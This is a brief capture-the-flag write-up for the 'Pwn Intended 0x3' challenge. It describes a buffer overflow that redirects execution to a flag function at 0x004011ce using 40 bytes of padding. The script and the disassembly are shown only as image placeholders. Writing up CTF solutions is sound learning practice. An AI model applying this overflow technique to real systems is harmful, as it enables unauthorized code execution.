Pwn Intended 0x3

less than 1 minute read

img

Same thing as Pwn intended 0x2, but this time our destination isn’t as visible

Start by analyzing the binary

img

img

Nothing interesting in main. We did notice sym.flag, let’s check that out

img

That’s what we want. So it looks like we’ll want to jump to 0x004011ce

Same as 0x2, find your padding using python and dmesg. 

img img

We can see that we start leaking in at 41, so we’ll use 40 for padding.

Script:

img

img